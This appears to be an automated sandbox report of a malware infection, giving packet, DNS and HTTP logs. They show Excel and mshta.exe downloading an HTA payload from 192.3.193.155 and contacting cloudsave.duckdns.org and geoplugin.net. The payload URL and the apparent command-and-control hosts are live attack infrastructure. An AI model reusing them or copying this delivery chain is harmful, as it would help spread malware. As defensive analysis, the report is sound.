Aug 28, 2024 06:57:04.080650091 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080660105 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080667973 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.080688953 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.080729961 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080739975 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080749989 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080769062 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.080843925 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080854893 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080864906 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080876112 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080882072 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.080903053 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.080934048 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080945015 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080955982 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.080972910 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.081072092 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081083059 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081093073 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081104040 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081106901 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.081115961 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081126928 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081127882 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.081139088 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081147909 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.081171989 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.081202984 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081213951 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081243038 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.081265926 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081276894 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081286907 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081307888 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.081407070 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081418991 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081428051 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081439018 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081446886 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.081450939 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081465960 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.081541061 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081552982 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081561089 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081572056 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081578970 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.081584930 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081609011 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.081693888 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081705093 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081720114 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081729889 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.081731081 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081743002 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081754923 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081758976 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.081765890 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081778049 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081778049 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.081789970 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081805944 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.081979990 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081990004 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.081995964 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.082000971 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.082005978 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.082015991 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.082026958 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.082027912 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.082041025 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.082042933 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.082076073 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.082748890 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.082761049 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.082771063 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.082803011 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.082809925 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.082825899 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.082837105 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.082848072 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.082858086 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.082859993 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.082890034 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.082945108 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.082953930 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.082962990 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.082974911 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.082982063 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.082986116 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.083002090 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.083062887 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.083075047 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.083085060 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.083101034 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.083127022 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.083138943 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.083148956 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.083161116 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.083168983 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.083201885 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.083233118 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.083244085 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.083252907 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.083264112 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.083276033 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.083298922 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.167123079 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167150021 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167161942 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167172909 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167184114 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167196035 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167206049 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167218924 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167212963 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.167259932 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.167259932 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.167304993 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167315006 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167325020 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167335987 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167351007 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.167354107 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167376995 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.167445898 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167458057 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167468071 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167479992 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167490959 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167499065 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.167501926 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167514086 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167519093 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.167525053 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167542934 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.167566061 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.167633057 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167644978 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167678118 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.167690992 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167705059 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167715073 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167747974 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.167766094 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167778015 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167788029 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167815924 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.167900085 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167911053 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167924881 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167936087 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167947054 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.167951107 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167963982 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.167967081 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.168005943 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.168034077 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.168045998 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.168055058 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.168066025 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.168076038 CEST  80  49177  192.3.193.155  192.168.2.22
Aug 28, 2024 06:57:04.168083906 CEST  49177  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:57:04.168087959 CEST  80  49177  192.3.193.155  192.168.2.22
                                                      Aug 28, 2024 06:57:04.168108940 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:04.168123960 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168145895 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168174028 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:04.168205976 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168216944 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168226004 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168248892 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:04.168308973 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168319941 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168329954 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168340921 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168355942 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:04.168371916 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:04.168391943 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168401957 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168412924 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168422937 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168436050 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:04.168459892 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:04.168540955 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168551922 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168560982 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168572903 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168582916 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168586969 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:04.168593884 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168605089 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168606997 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:04.168623924 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.168629885 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:04.168665886 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:04.168781996 CEST8049177192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:57:04.304491043 CEST4917780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:34.044358015 CEST1464549170192.3.64.135192.168.2.22
                                                      Aug 28, 2024 06:57:34.045882940 CEST4917014645192.168.2.22192.3.64.135
                                                      Aug 28, 2024 06:57:34.050825119 CEST1464549170192.3.64.135192.168.2.22
                                                      Aug 28, 2024 06:58:01.415756941 CEST4917280192.168.2.22178.237.33.50
                                                      Aug 28, 2024 06:58:01.735013008 CEST4917280192.168.2.22178.237.33.50
                                                      Aug 28, 2024 06:58:02.327795029 CEST4917280192.168.2.22178.237.33.50
                                                      Aug 28, 2024 06:58:03.528995991 CEST4917280192.168.2.22178.237.33.50
                                                      Aug 28, 2024 06:58:04.074624062 CEST1464549170192.3.64.135192.168.2.22
                                                      Aug 28, 2024 06:58:04.075916052 CEST4917014645192.168.2.22192.3.64.135
                                                      Aug 28, 2024 06:58:04.080674887 CEST1464549170192.3.64.135192.168.2.22
                                                      Aug 28, 2024 06:58:05.962579012 CEST4917280192.168.2.22178.237.33.50
                                                      Aug 28, 2024 06:58:10.860896111 CEST4917280192.168.2.22178.237.33.50
                                                      Aug 28, 2024 06:58:20.532984018 CEST4917280192.168.2.22178.237.33.50
                                                      Aug 28, 2024 06:58:34.077111006 CEST1464549170192.3.64.135192.168.2.22
                                                      Aug 28, 2024 06:58:34.080347061 CEST4917014645192.168.2.22192.3.64.135
                                                      Aug 28, 2024 06:58:34.085201979 CEST1464549170192.3.64.135192.168.2.22
                                                      Aug 28, 2024 06:59:04.109985113 CEST1464549170192.3.64.135192.168.2.22
                                                      Aug 28, 2024 06:59:04.129148960 CEST4917014645192.168.2.22192.3.64.135
                                                      Aug 28, 2024 06:59:04.134068012 CEST1464549170192.3.64.135192.168.2.22
                                                      Aug 28, 2024 06:59:34.133146048 CEST1464549170192.3.64.135192.168.2.22
                                                      Aug 28, 2024 06:59:34.135364056 CEST4917014645192.168.2.22192.3.64.135
                                                      Aug 28, 2024 06:59:34.140167952 CEST1464549170192.3.64.135192.168.2.22
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Aug 28, 2024 06:56:26.861217976 CEST5456253192.168.2.228.8.8.8
                                                      Aug 28, 2024 06:56:26.868262053 CEST53545628.8.8.8192.168.2.22
                                                      Aug 28, 2024 06:56:28.906941891 CEST5291753192.168.2.228.8.8.8
                                                      Aug 28, 2024 06:56:28.913908958 CEST53529178.8.8.8192.168.2.22
                                                      Aug 28, 2024 06:56:41.334906101 CEST6275153192.168.2.228.8.8.8
                                                      Aug 28, 2024 06:56:41.344485044 CEST53627518.8.8.8192.168.2.22
                                                      Aug 28, 2024 06:56:45.580848932 CEST5789353192.168.2.228.8.8.8
                                                      Aug 28, 2024 06:56:45.679141045 CEST53578938.8.8.8192.168.2.22
                                                      Aug 28, 2024 06:56:47.216500044 CEST5482153192.168.2.228.8.8.8
                                                      Aug 28, 2024 06:56:47.225435972 CEST53548218.8.8.8192.168.2.22
                                                      Aug 28, 2024 06:56:48.870204926 CEST5471953192.168.2.228.8.8.8
                                                      Aug 28, 2024 06:56:48.880779028 CEST53547198.8.8.8192.168.2.22
                                                      Aug 28, 2024 06:57:00.551064968 CEST4988153192.168.2.228.8.8.8
                                                      Aug 28, 2024 06:57:00.562598944 CEST53498818.8.8.8192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 28, 2024 06:56:26.861217976 CEST | 192.168.2.22 | 8.8.8.8 | 0xa29f | Standard query (0) | zhort.de | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:56:28.906941891 CEST | 192.168.2.22 | 8.8.8.8 | 0x26dd | Standard query (0) | zhort.de | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:56:41.334906101 CEST | 192.168.2.22 | 8.8.8.8 | 0xbf29 | Standard query (0) | ia803104.us.archive.org | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:56:45.580848932 CEST | 192.168.2.22 | 8.8.8.8 | 0xa4a2 | Standard query (0) | cloudsave.duckdns.org | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:56:47.216500044 CEST | 192.168.2.22 | 8.8.8.8 | 0x68d7 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:56:48.870204926 CEST | 192.168.2.22 | 8.8.8.8 | 0xd3d3 | Standard query (0) | zhort.de | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:57:00.551064968 CEST | 192.168.2.22 | 8.8.8.8 | 0x13a5 | Standard query (0) | ia803104.us.archive.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 28, 2024 06:56:26.868262053 CEST | 8.8.8.8 | 192.168.2.22 | 0xa29f | No error (0) | zhort.de | | 88.99.66.38 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:56:28.913908958 CEST | 8.8.8.8 | 192.168.2.22 | 0x26dd | No error (0) | zhort.de | | 88.99.66.38 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:56:41.344485044 CEST | 8.8.8.8 | 192.168.2.22 | 0xbf29 | No error (0) | ia803104.us.archive.org | | 207.241.232.154 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:56:45.679141045 CEST | 8.8.8.8 | 192.168.2.22 | 0xa4a2 | No error (0) | cloudsave.duckdns.org | | 192.3.64.135 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:56:47.225435972 CEST | 8.8.8.8 | 192.168.2.22 | 0x68d7 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:56:48.880779028 CEST | 8.8.8.8 | 192.168.2.22 | 0xd3d3 | No error (0) | zhort.de | | 88.99.66.38 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 06:57:00.562598944 CEST | 8.8.8.8 | 192.168.2.22 | 0x13a5 | No error (0) | ia803104.us.archive.org | | 207.241.232.154 | A (IP address) | IN (0x0001) | false
                                                      • zhort.de
                                                      • ia803104.us.archive.org
                                                      • 192.3.193.155
                                                      • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49164 | 192.3.193.155 | 80 | 3528 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp | Bytes transferred | Direction | Data
Aug 28, 2024 06:56:27.874830961 CEST | 357 | OUT | GET /xampp/boz/bz/IEnetworkroundthings.hta HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 192.3.193.155
Connection: Keep-Alive
Aug 28, 2024 06:56:28.368331909 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Aug 2024 04:56:28 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Wed, 28 Aug 2024 01:17:45 GMT
ETag: "1ccb3-620b4202337ba"
Accept-Ranges: bytes
Content-Length: 117939
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49166 | 192.3.193.155 | 80 | 3776 | C:\Windows\System32\mshta.exe

Timestamp | Bytes transferred | Direction | Data
Aug 28, 2024 06:56:29.945830107 CEST | 434 | OUT | GET /xampp/boz/bz/IEnetworkroundthings.hta HTTP/1.1
Accept: */*
Accept-Language: en-US
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Range: bytes=8895-
Connection: Keep-Alive
Host: 192.3.193.155
If-Range: "1ccb3-620b4202337ba"
Aug 28, 2024 06:56:30.438086033 CEST | 1236 | IN | HTTP/1.1 206 Partial Content
Date: Wed, 28 Aug 2024 04:56:30 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Wed, 28 Aug 2024 01:17:45 GMT
ETag: "1ccb3-620b4202337ba"
Accept-Ranges: bytes
Content-Length: 109044
Content-Range: bytes 8895-117938/117939
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/hta
                                                      Data Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 [TRUNCATED]
                                                      Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25253A%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2
                                                      Aug 28, 2024 06:56:30.438103914 CEST1236INData Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30
                                                      Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520
                                                      Aug 28, 2024 06:56:30.438113928 CEST1236INData Raw: 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32
